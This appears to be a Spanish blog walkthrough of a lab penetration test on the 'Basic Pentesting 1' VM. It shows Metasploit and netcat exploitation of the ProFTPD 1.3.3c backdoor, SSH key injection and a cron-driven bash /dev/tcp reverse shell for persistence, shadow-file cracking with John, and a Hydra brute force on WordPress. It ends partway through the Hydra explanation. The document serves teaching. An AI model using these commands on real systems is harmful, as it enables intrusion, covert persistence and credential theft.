La configuraci\u00f3n en modo NAT garantiza que ambas m\u00e1quinas compartan la misma red virtual, facilitando la comunicaci\u00f3n y el escaneo de servicios sin interferencias externas. Este tipo de laboratorio virtual es perfecto para practicar t\u00e9cnicas ofensivas con total seguridad.<\/p>\n\n\n\n
Herramientas empleadas en el proceso de pentesting<\/h3>\n\n\n\n\n- ping<\/li>\n\n\n\n
- nmap<\/li>\n\n\n\n
- metasploit<\/li>\n\n\n\n
- NetCat (nc)<\/li>\n\n\n\n
- OpenSSL<\/li>\n\n\n\n
- John the Ripper<\/li>\n\n\n\n
- GoBuster<\/li>\n\n\n\n
- Nikto<\/li>\n\n\n\n
- Wpscan<\/li>\n\n\n\n
- Hydra<\/li>\n<\/ul>\n\n\n\n
Reconocimiento y enumeraci\u00f3n inicial<\/h2>\n\n\n\n
El primer paso en cualquier ejercicio de pentesting es confirmar la conectividad entre las m\u00e1quinas. De forma preliminar, lanc\u00e9 un ping manual desde Kali Linux hacia la m\u00e1quina objetivo para asegurarme de que ambas estaban en la misma red y pod\u00edan comunicarse. Aunque conoc\u00eda la IP de cada m\u00e1quina (obtenida desde la interfaz de login en la v\u00edctima y con ifconfig en Kali), lo m\u00e1s adecuado en un entorno real ser\u00eda realizar un proceso de enumeraci\u00f3n de red.<\/p>\n\n\n\n
En lugar de hacerlo manualmente, se puede automatizar con scripts que env\u00edan pings a rangos de IP, o utilizar herramientas m\u00e1s potentes como nmap para detectar hosts activos mediante escaneo ARP o ICMP.<\/p>\n\n\n\n
Conociendo la IP de la m\u00e1quina objetivo, he tratado de obtener m\u00e1s informaci\u00f3n. Con la herramienta nmap he hecho un escaneo para conocer los puertos que tiene esta m\u00e1quina abiertos, as\u00ed como los servicios que tiene en ejecuci\u00f3n y sus versiones. He hecho un an\u00e1lisis completo, lo cu\u00e1l incluye los puertos UDP, que muchas veces son olvidados, pero pueden revelar servicios cr\u00edticos.<\/p>\n\n\n\n
\n![\"Captura](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2025\/08\/0-nmap.png\")
\n<\/a>Imagen 1. Zenmap revela servicios ProFTPD, OpenSSH y Apache en la IP 192.168.40.138.<\/p><\/div>\n\n\n\n
Los resultados arrojan que hay tres servicios con los puertos abiertos (FTP, SSH y HTTP). Vamos a ir uno a uno, buscando vulnerabilidades que nos permitan entrar en la m\u00e1quina y escalar privilegios hasta root.<\/p>\n\n\n\n
Pentesting del servicio FTP: ProFTPD<\/h2>\n\n\n\n
Tras detectar que el servicio FTP estaba expuesto en el puerto 21, el siguiente paso fue identificar su versi\u00f3n y verificar si exist\u00edan vulnerabilidades conocidas. En este caso, el sistema utiliza ProFTPD versi\u00f3n 1.3.3c, una versi\u00f3n antigua que presenta varias fallas de seguridad.<\/p>\n\n\n\n
Examinando bases de datos, como las de INCIBE o NIST, encontramos vulnerabilidades. A trav\u00e9s de archive.org y su \u201cwayback machine\u201d podemos acceder a securityfocus<\/a> que, en su d\u00eda, adem\u00e1s de la informaci\u00f3n, ofrec\u00eda los exploits para aprovecharse de la vulnerabilidad.<\/p>\n\n\n\nPrimer intento: Exploit mod_copy (CVE-2015-3306)<\/h3>\n\n\n\n
Lo primero que prob\u00e9 fue la vulnerabilidad CVE\u20112015\u20113306<\/strong>, la cual est\u00e1 en la biblioteca de metasploit. Para aprovecharla, hace falta que el Daemon est\u00e9 compilado con mod_copy y que este m\u00f3dulo este habilitado.<\/p>\n\n\n\nmsf6 > use exploit\/unix\/ftp\/proftpd_modcopy_exec \n[*] No payload configured, defaulting to cmd\/unix\/reverse_netcat\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > set RPORT 21\nRPORT => 21\nmsf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > run\n[*] Started reverse TCP handler on 192.168.40.137:4444 \n[*] 192.168.40.138:21 - 192.168.40.138:21 - Connected to FTP server\n[*] 192.168.40.138:21 - 192.168.40.138:21 - Sending copy commands to FTP server\n[-] 192.168.40.138:21 - Exploit aborted due to failure: unknown: 192.168.40.138:21 - Failure copying from \/proc\/self\/cmdline\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n\n\n\nEl exploit falla debido a que esta compilaci\u00f3n no trae mod_copy, o si lo trae, no est\u00e1 habilitado.<\/p>\n\n\n\n
Segundo intento: Backdoor \u00abACIDBITCHEZ\u00bb<\/h3>\n\n\n\n
Vamos a probar ahora la siguiente vulnerabilidad. En 2010 se atac\u00f3 esta versi\u00f3n de ProFTPD, suplantando el binario de su p\u00e1gina web con otro distinto. Esta versi\u00f3n suplantada inclu\u00eda la siguiente l\u00ednea de c\u00f3digo:<\/p>\n\n\n\n
if (strcmp(target, \"ACIDBITCHEZ\") == 0) {\nsetuid(0);\nsetgid(0);\nsystem(\"\/bin\/sh;\/sbin\/sh\");\n}<\/code><\/pre>\n\n\n\nEsto permite obtener una shell como root simplemente autentic\u00e1ndose con la cadena especial. Us\u00e9 el m\u00f3dulo proftpd_133c_backdoor de Metasploit para aprovechar esta puerta trasera:<\/p>\n\n\n\n
msf6 exploit(unix\/ftp\/proftpd_modcopy_exec) > use exploit\/unix\/ftp\/proftpd_133c_backdoor\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set RPORT 21\nRPORT => 21\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse_\nset PAYLOAD cmd\/unix\/reverse_bash_telnet_ssl\nset PAYLOAD cmd\/unix\/reverse_perl\nset PAYLOAD cmd\/unix\/reverse_perl_ssl\nset PAYLOAD cmd\/unix\/reverse_ssl_double_telnet\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse\nset PAYLOAD cmd\/unix\/reverse\nset PAYLOAD cmd\/unix\/reverse_bash_telnet_ssl\nset PAYLOAD cmd\/unix\/reverse_perl\nset PAYLOAD cmd\/unix\/reverse_perl_ssl\nset PAYLOAD cmd\/unix\/reverse_ssl_double_telnet\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set PAYLOAD cmd\/unix\/reverse\nPAYLOAD => cmd\/unix\/reverse\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > set LHOST 192.168.40.137\nLHOST => 192.168.40.137\nmsf6 exploit(unix\/ftp\/proftpd_133c_backdoor) > run\n[*] Started reverse TCP double handler on 192.168.40.137:4444 \n[*] 192.168.40.138:21 - Sending Backdoor Command\n[*] Accepted the first client connection...\n[*] Accepted the second client connection...\n[*] Command: echo Fmfm9tBLdbvaYnqy;\n[*] Writing to socket A\n[*] Writing to socket B\n[*] Reading from sockets...\n[*] Reading from socket B\n[*] B: \"Fmfm9tBLdbvaYnqy\\r\\n\"\n[*] Matching...\n[*] A is input...\n[*] Command shell session 1 opened (192.168.40.137:4444 -> 192.168.40.138:44946) at 2025-07-17 17:35:28 -0400\nwhoami\nroot<\/code><\/pre>\n\n\n\nComo se observa, se ha conseguido escalar privilegios a root.<\/p>\n\n\n\n
Alternativa: Explotando la backdoor con NetCat<\/h4>\n\n\n\n
Este mismo proceso se puede hacer con NetCat (nc), y es bastante m\u00e1s sencillo que con Metasploit:<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~]\n\u2514\u2500$ nc 192.168.40.138 21 \n220 ProFTPD 1.3.3c Server (vtcsec) [192.168.40.138]\nHELP ACIDBITCHEZ\nwhoami \nroot<\/code><\/pre>\n\n\n\nPersistencia en sistemas comprometidos<\/h2>\n\n\n\n
Una vez obtenido el acceso a la m\u00e1quina, una buena pr\u00e1ctica es asegurar alg\u00fan tipo de persistencia, es decir, dejar una puerta trasera que permita volver a entrar en el sistema sin necesidad de repetir toda la explotaci\u00f3n inicial.<\/p>\n\n\n\n
Aunque en este caso se trata de un escenario de pruebas, si el sistema se actualizara en el futuro es muy probable que las vulnerabilidades explotadas dejen de ser efectivas. Por eso, tom\u00e9 la precauci\u00f3n de establecer un m\u00e9todo de acceso persistente v\u00eda SSH con clave privada.<\/p>\n\n\n\n
Alternativa 1: Acceso con clave privada<\/h3>\n\n\n\n
En lugar de crear un nuevo usuario \u2014acci\u00f3n que en un entorno real podr\u00eda levantar sospechas\u2014 opt\u00e9 por una alternativa m\u00e1s discreta: inyectar una clave p\u00fablica en un usuario ya existente (marlinspike), habilitando el acceso remoto por SSH sin contrase\u00f1a.<\/p>\n\n\n\n
Generaci\u00f3n de la pareja de claves e inyecci\u00f3n<\/h4>\n\n\n\n
Mi idea es acceder a la m\u00e1quina con una clave privada. Por eso, he creado una pareja de claves RSA en mi m\u00e1quina Kali:<\/p>\n\n\n\n
ssh-keygen -t rsa -b 4096 -f ~\/.ssh\/basicp1_rsa -C \"basic-pentesting-lab\"<\/code><\/pre>\n\n\n\nHe inyectado la clave p\u00fablica en el directorio \u201c\/home\/marlinspike\/.ssh\/authorized_keys\u201d:<\/p>\n\n\n\n
echo \"ssh-rsa AAAAB3NzaC1yc \u2026 \/RbB5\/7vydaTQ2Q== basic-pentesting-lab\" >> \/home\/marlinspike\/.ssh\/authorized_keys<\/code><\/pre>\n\n\n\nHe dado los siguientes permisos:<\/p>\n\n\n\n
chmod 700 \/home\/marlinspike\/.ssh\nchmod 600 \/home\/marlinspike\/.ssh\/authorized_keys\nchown -R marlinspike:marlinspike \/home\/marlinspike\/.ssh<\/code><\/pre>\n\n\n\nConfiguraci\u00f3n del servicio SSH<\/h4>\n\n\n\n
He modificado el fichero de configuraci\u00f3n \/etc\/ssh\/sshd_config para asegurar que permita la autenticaci\u00f3n por SSH sin contrase\u00f1a y por clave p\u00fablica.<\/p>\n\n\n\n
grep -E 'PermitRootLogin|PasswordAuthentication|PubkeyAuthentication|UsePAM' \/etc\/ssh\/sshd_config\nPermitRootLogin prohibit-password\nPubkeyAuthentication yes\n#PasswordAuthentication yes\nUsePAM yes<\/code><\/pre>\n\n\n\nEsto indica que el login por clave p\u00fablica est\u00e1 habilitado, pero el acceso directo como root est\u00e1 restringido por contrase\u00f1a, lo cual no afecta nuestro m\u00e9todo. Da igual, ya que el usuario est\u00e1 en la lista de sudoers.<\/p>\n\n\n\n
Verificaci\u00f3n del acceso persistente<\/h4>\n\n\n\n
Desde Kali, valid\u00e9 que pod\u00eda acceder a la m\u00e1quina comprometida usando mi clave privada:<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/.ssh]\n\u2514\u2500$ ssh -i ~\/.ssh\/basicp1_rsa marlinspike@192.168.40.138\nWelcome to Ubuntu 16.04.3 LTS (GNU\/Linux 4.10.0-28-generic x86_64)<\/code><\/pre>\n\n\n\nCon esto, ya tengo un acceso estable y discreto que me permitir\u00e1 entrar en cualquier momento sin necesidad de repetir el vector inicial.<\/p>\n\n\n\n
Este m\u00e9todo de persistencia es muy com\u00fan en escenarios reales y, aunque puede dejar huella (por ejemplo, en logs o en la fecha de modificaci\u00f3n del archivo authorized_keys), es mucho menos visible que otros mecanismos como creaci\u00f3n de nuevos usuarios o servicios maliciosos.<\/p>\n\n\n\n
Alternativa 2: Descifrando la contrase\u00f1a del usuario<\/h3>\n\n\n\n
Adem\u00e1s de garantizar un acceso persistente por SSH, otra estrategia \u00fatil es obtener las credenciales reales del sistema. Esto permite acceder de forma a\u00fan m\u00e1s discreta, sin dejar rastro evidente (como archivos authorized_keys o modificaciones en sshd_config).<\/p>\n\n\n\n
Como contaba con privilegios de root, tambi\u00e9n tuve acceso de lectura a los ficheros \/etc\/passwd y \/etc\/shadow.<\/p>\n\n\n\n
Estos archivos contienen informaci\u00f3n cr\u00edtica sobre los usuarios y sus contrase\u00f1as encriptadas. Si estas contrase\u00f1as son d\u00e9biles o comunes, pueden romperse f\u00e1cilmente con herramientas como John the Ripper o Hashcat mediante ataques de diccionario o fuerza bruta. \u00a1Vamos a intentarlo!<\/p>\n\n\n\n
An\u00e1lisis del hash extraido<\/h4>\n\n\n\n
En el fichero passwd encontramos la siguiente l\u00ednea:<\/p>\n\n\n\n
marlinspike:$6$wQb5nV3T$xB2WO\/jOkbn4t1RUILrckw69LR\/0EMtUbFFCYpM3MUHVmtyYW9.ov\/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4\/:17484:0:99999:7:::<\/code><\/pre>\n\n\n\nEl formato nos interesa conocer es el siguiente: $id$salt$hashedpassword. Sabemos que hay un usuario llamado marlinspike, por el ID 6 descubrimos que la contrase\u00f1a est\u00e1 cifrada a trav\u00e9s de SHA512-crypt, y que tiene una salt (wQb5nV3T), esto quiere decir que se le a\u00f1ade un valor aleatorio \u00fanico a la palabra (en este caso contrase\u00f1a) a cifrar.<\/p>\n\n\n\n
La sal aumenta la entrop\u00eda o aleatoriedad, haci\u00e9ndolo m\u00e1s robusto ante tablas arco\u00edris o ataques de fuerza bruta por b\u00fasqueda de hash. Finalmente, despu\u00e9s de la sal aparece el resumen de la contrase\u00f1a cifrada con esa sal. Si la contrase\u00f1a es sencilla y vulnerable a ataques de diccionario, la sal no va a hacer milagros.<\/p>\n\n\n\n
Cabe decir que SHA512-crypt est\u00e1 dise\u00f1ado para ser computacionalmente costoso, de forma que dificulte ataques de fuerza bruta o diccionario. A\u00fan as\u00ed, si la contrase\u00f1a es d\u00e9bil, puede romperse con herramientas como John the Ripper.<\/p>\n\n\n\n
Ataque con John the Ripper<\/h4>\n\n\n\n
He copiado en mi m\u00e1quina Kali los dos ficheros mencionados, passwd y shadow. Para intentar descifrar la contrase\u00f1a, combin\u00e9 ambos archivos con unshadow, y ejecut\u00e9 el ataque (limpiando primero cualquier salida de alguna ejecuci\u00f3n anterior):<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ unshadow passwd shadow > p.txt\n\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ rm ~\/.john\/john.pot \n\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ john p.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 8 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nWarning: Only 13 candidates buffered for the current salt, minimum 32 needed for performance.\nmarlinspike (marlinspike) \n1g 0:00:00:00 DONE 1\/3 (2025-07-24 13:35) 100.0g\/s 1300p\/s 1300c\/s 1300C\/s marlinspike..MarlinspikeMarlinspike\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\n\n\nEl proceso fue casi inmediato. La contrase\u00f1a del usuario se correspond\u00eda con su nombre, es decir \u201cmarlinspike\u201d. Era un escenario muy sencillo y se ha logrado encontrar la contrase\u00f1a con John the Ripper. Esto demuestra la importancia de utilizar contrase\u00f1as seguras, ya que ahora tenemos acceso a la m\u00e1quina a trav\u00e9s de este usuario, y adem\u00e1s est\u00e1 en la lista de sudoers.<\/p>\n\n\n\n
Con esto hemos logrado ya el objetivo principal, que es escalar privilegios en una m\u00e1quina. No obstante, vamos a seguir investigando qu\u00e9 otras cosas podemos hacer.<\/p>\n\n\n\n
Alternativa 3: Persistencia con cronjob y reverse shell en Bash<\/h3>\n\n\n\n
Adem\u00e1s de dejar una clave SSH o descifrar la contrase\u00f1a del usuario, existe una t\u00e9cnica a\u00fan m\u00e1s discreta para mantener el acceso: crear una reverse shell persistente mediante un cronjob que se ejecuta de forma peri\u00f3dica.<\/p>\n\n\n\n
Esta t\u00e9cnica aprovecha una funcionalidad poco conocida de Bash: la posibilidad de abrir sockets directamente desde el int\u00e9rprete de comandos, gracias a que en Unix todo es un archivo, incluidos los sockets TCP.<\/p>\n\n\n\n
Reverse shell en Bash usando \/dev\/tcp<\/h4>\n\n\n\n
Bash permite enviar y recibir datos a trav\u00e9s de sockets TCP utilizando rutas especiales como \/dev\/tcp\/IP\/PUERTO. Esto hace posible lanzar una reverse shell sin herramientas externas:<\/p>\n\n\n\n
bash -i >& \/dev\/tcp\/192.168.40.137\/4444 0>&1<\/code><\/pre>\n\n\n\nEsto conecta la shell interactiva directamente al atacante, redirigiendo la entrada\/salida est\u00e1ndar al socket TCP. Es una t\u00e9cnica ligera y funcional incluso en entornos muy restringidos.<\/p>\n\n\n\n
Automatizaci\u00f3n con cron<\/h4>\n\n\n\n
Para mantener el acceso activo incluso tras un reinicio del sistema o p\u00e9rdida de conexi\u00f3n, podemos automatizar esta reverse shell con un cronjob:<\/p>\n\n\n\n
echo \"* * * * * bash -i >& \/dev\/tcp\/192.168.40.137\/4444 0>&1\" >> \/tmp\/persist\ncrontab \/tmp\/persist<\/code><\/pre>\n\n\n\nEsto genera una tarea programada que se ejecuta cada minuto, estableciendo una nueva reverse shell con el atacante. Desde la perspectiva del sistema, es simplemente un proceso de Bash ejecutando un script, lo cual puede pasar desapercibido si no se monitoriza la salida de crontab -l.<\/p>\n\n\n\n
An\u00e1lisis del servidor web Apache<\/h2>\n\n\n\n
Durante la fase de enumeraci\u00f3n de servicios, detect\u00e9 que el servidor Apache estaba activo en el puerto 80. Esto abr\u00eda la posibilidad de encontrar un nuevo vector de entrada, especialmente si el contenido expuesto o la configuraci\u00f3n del servidor presentaban vulnerabilidades.<\/p>\n\n\n\n
Enumeraci\u00f3n web<\/h3>\n\n\n\n
Al acceder inicialmente v\u00eda navegador a http:\/\/192.168.40.138, aparece la cl\u00e1sica p\u00e1gina de \u00abIt Works!\u00bb de Apache. Esto indica que el servidor est\u00e1 activo, pero no revela informaci\u00f3n \u00fatil\u2026 al menos a simple vista.<\/p>\n\n\n\n
An\u00e1lisis con Gobuster<\/h4>\n\n\n\n
Para descubrir rutas ocultas, utilic\u00e9 Gobuster, una herramienta de enumeraci\u00f3n de directorios y archivos basada en diccionario:<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.40.138 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.40.138\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/secret (Status: 301) [Size: 317] [--> http:\/\/192.168.40.138\/secret\/] \n\/server-status (Status: 403) [Size: 279]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\n\n\nLa herramienta gobuster enumera los archivos ocultos junto con los directorios remotos. Gobuster es un esc\u00e1ner agresivo, es ruidoso y se hace notar. En este escenario nos vale, y nos ha permitido descubrir el directorio \u201csecret\u201d. Esto es interesante, ya que redirige a una p\u00e1gina no listada en la ra\u00edz.<\/p>\n\n\n\n
An\u00e1lisis con Nikto<\/h4>\n\n\n\n
Otra herramienta es Nikto, un esc\u00e1ner de servidor web de c\u00f3digo abierto (GPL) y de uso gratuito que realiza un escaneo de vulnerabilidades en servidores web. Busca m\u00faltiples elementos, incluyendo archivos y programas peligrosos, as\u00ed como versiones desactualizadas del software del servidor web. Tambi\u00e9n comprueba si hay errores de configuraci\u00f3n del servidor y las posibles vulnerabilidades que puedan haber introducido.<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ nikto -h http:\/\/192.168.40.138 \n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.40.138\n+ Target Hostname: 192.168.40.138\n+ Target Port: 80\n+ Start Time: 2025-07-25 23:09:37 (GMT2)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.18 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. \n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: b1, size: 55e1c7758dcdb, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.18 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .\n+ \/secret\/: Drupal Link header found with value: <http:\/\/vtcsec\/secret\/index.php\/wp-json\/>; rel=\"https:\/\/api.w.org\/\". See: https:\/\/www.drupal.org\/\n+ \/secret\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host\n+ End Time: 2025-07-25 23:09:54 (GMT2) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\n\n\nEn resumen, esta salida nos est\u00e1 diciendo que el servidor usa Apache\/2.4.18 (Ubuntu), una versi\u00f3n antigua con riesgos de seguridad conocidos. Falta de cabeceras de protecci\u00f3n como X-Frame-Options y X-Content-Type-Options, lo que facilita ataques como clickjacking. El servidor tiene el m\u00e9todo HTTP OPTIONS habilitado, exponiendo informaci\u00f3n innecesaria. Adem\u00e1s, el archivo \/icons\/README es accesible, revelando detalles de la configuraci\u00f3n.<\/p>\n\n\n\n
Adem\u00e1s, esta herramienta tambi\u00e9n encontr\u00f3 el directorio oculto (\/secret\/) con una cabecera HTTP vinculada a sistemas como WordPress o Drupal, sugiriendo una posible instalaci\u00f3n de WordPress, la cual investigaremos en el siguiente apartado. Hay que decir tambi\u00e9n que Nikto nos est\u00e1 dando pistas, indicando que miremos algunas de las CVE que ha encontrado durante su an\u00e1lisis.<\/p>\n\n\n\n
Analizando WordPress<\/h2>\n\n\n\n
Ya hemos visto que en apache est\u00e1 accesible una ruta que es la IP de la m\u00e1quina y el directorio secret. Alcanzando esa ruta, se llega a una p\u00e1gina creada con WordPress:<\/p>\n\n\n\n
\n![\"P\u00e1gina](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2025\/08\/1-wordpress.png\")
\n<\/a>Imagen 2. Interfaz por defecto de WordPress identificada como punto de entrada potencial.<\/p><\/div>\n\n\n\n
Detect\u00e9 que las URLs internas del sitio estaban asociadas al dominio vtcsec. Aunque segu\u00eda siendo accesible mediante la IP, para mayor comodidad a\u00f1ad\u00ed una entrada en el archivo \/etc\/hosts.<\/p>\n\n\n\n
echo \"192.168.40.138 vtcsec\" | sudo tee -a \/etc\/hosts<\/code><\/pre>\n\n\n\nEsto permite trabajar con nombres de dominio en lugar de IPs.<\/p>\n\n\n\n
Enumeraci\u00f3n en WordPress<\/h3>\n\n\n\n
Si entramos en la entrada del blog, podemos ver qu\u00e9 usuario la ha publicado, admin.<\/p>\n\n\n\n
\n![\"Post](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2025\/08\/2-identify-admin.png\")
\n<\/a>Imagen 3. El autor del post de bienvenida permite identificar credenciales objetivo.<\/p><\/div>\n\n\n\n
A continuaci\u00f3n, utilizo wpscan para identificar informaci\u00f3n clave del CMS:<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ wpscan --url http:\/\/192.168.40.138\/secret --enumerate u \n[+] URL: http:\/\/192.168.40.138\/secret\/ [192.168.40.138]\nInteresting Finding(s):\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.18 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n[+] XML-RPC seems to be enabled: http:\/\/192.168.40.138\/secret\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n[+] WordPress readme found: http:\/\/192.168.40.138\/secret\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.40.138\/secret\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/192.168.40.138\/secret\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=4.9'\n | Confirmed By: Meta Generator (Passive Detection)\n | - http:\/\/192.168.40.138\/secret\/, Match: 'WordPress 4.9'\n[i] The main theme could not be detected.\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 <> (10 \/ 10) 100.00% Time: 00:00:00\n[i] User(s) Identified:\n[+] admin\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https:\/\/wpscan.com\/register<\/code><\/pre>\n\n\n\nNos ha arrojado informaci\u00f3n que ya ten\u00edamos sobre Apache y sobre el usuario de WordPress, confirmando que es \u201cadmin\u201d. Si estuvi\u00e9ramos registrados en su web, recebiriamos un token para su API, a trav\u00e9s del cual podr\u00edamos tener informaci\u00f3n adicional sobre vulnerabilidades CVE presentes en su correspondiente versi\u00f3n.<\/p>\n\n\n\n
Acceso con credenciales por defecto<\/h3>\n\n\n\n
Conociendo wordpress, es frecuente que exista una p\u00e1gina llamada wp-admin. Y efectivamente, si entramos en vtcsec\/secret\/wp-admin encontramos la pantalla de login. He probado con las credenciales por defecto (usuario \u201cadmin\u201d y contrase\u00f1a \u201cadmin\u201d y me ha dejado acceder al panel. Esto no deber\u00eda ocurrir, pero ya vemos que no estaba securizado. Esto representa una falla cr\u00edtica de seguridad al no haber sido cambiadas las credenciales predeterminadas.<\/p>\n\n\n\n
\n![\"Formulario](\"https:\/\/jagumiel.xyz\/blog\/wp-content\/uploads\/2025\/08\/3-wordpress_admin.png\")
\n<\/a>Imagen 4. Pantalla de login en WordPress para ingresar con el usuario admin.<\/p><\/div>\n\n\n\n
Acceso por fuerza bruta<\/h3>\n\n\n\n
Las cosas no siempre son as\u00ed de f\u00e1ciles, es por ello que existen otras formas de conseguir acceso, o de buscar la contrase\u00f1a (o al menos, intentarlo). Una opci\u00f3n es con Hydra. Lanc\u00e9 un ataque de fuerza bruta con el diccionario \u201crockyou.txt\u201d.<\/p>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.40.138 http-form-post '\/secret\/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-07-30 22:03:44\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.40.138:80\/secret\/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location\n[STATUS] 4154.00 tries\/min, 4154 tries in 00:01h, 14340244 to do in 57:33h, 16 active\n[STATUS] 4129.33 tries\/min, 12388 tries in 00:03h, 14332010 to do in 57:51h, 16 active\n[80][http-post-form] host: 192.168.40.138 login: admin password: admin\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-07-30 22:08:32<\/code><\/pre>\n\n\n\nExplicaci\u00f3n r\u00e1pida del commando:<\/p>\n\n\n\n
\n- -l admin: Usuario objetivo (identificado previamente con WPScan).<\/li>\n\n\n\n
- -P \/usr\/share\/wordlists\/rockyou.txt: Lista de contrase\u00f1as com\u00fan.<\/li>\n\n\n\n
- http-form-post: Tipo de ataque dirigido a formularios HTML v\u00eda POST.<\/li>\n\n\n\n
- Ruta del formulario<\/strong>: \/secret\/wp-login.php.<\/li>\n\n\n\n
- Campos del formulario<\/strong>:
- log=^USER^: Campo para el usuario.<\/li><\/ul>
- pwd=^PASS^: Campo para la contrase\u00f1a.<\/li><\/ul>\n
